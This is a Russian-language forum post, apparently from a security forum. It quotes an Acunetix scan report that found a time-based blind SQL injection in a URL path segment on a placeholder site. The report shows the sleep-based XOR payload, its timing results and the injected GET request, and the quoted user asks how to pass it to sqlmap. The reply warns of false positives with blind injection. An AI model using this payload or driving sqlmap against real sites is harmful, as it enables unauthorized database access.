Показать сообщение отдельно

  #8  
Старый 27.04.2020, 01:34
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от vladF  

Всем привет. Acunetix выдал такое:
Код:
Уязвимость затрагивает https://www.site.com/ , /  /  /[*] /  /

Обнаружено слепым SQL-инъекцией

Детали атаки
arrow_drop_up
Вход фрагмента пути /  /  /[*] /  / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены

тесты :
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31

Первоначальное значение: doe-spiransuchor

HTTP-запрос
arrow_drop_up
GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
Как правильно скормить в sqlmap?
Точно так же как написали выше, со слепыми может быть ложное срабатывание
 
Ответить с цитированием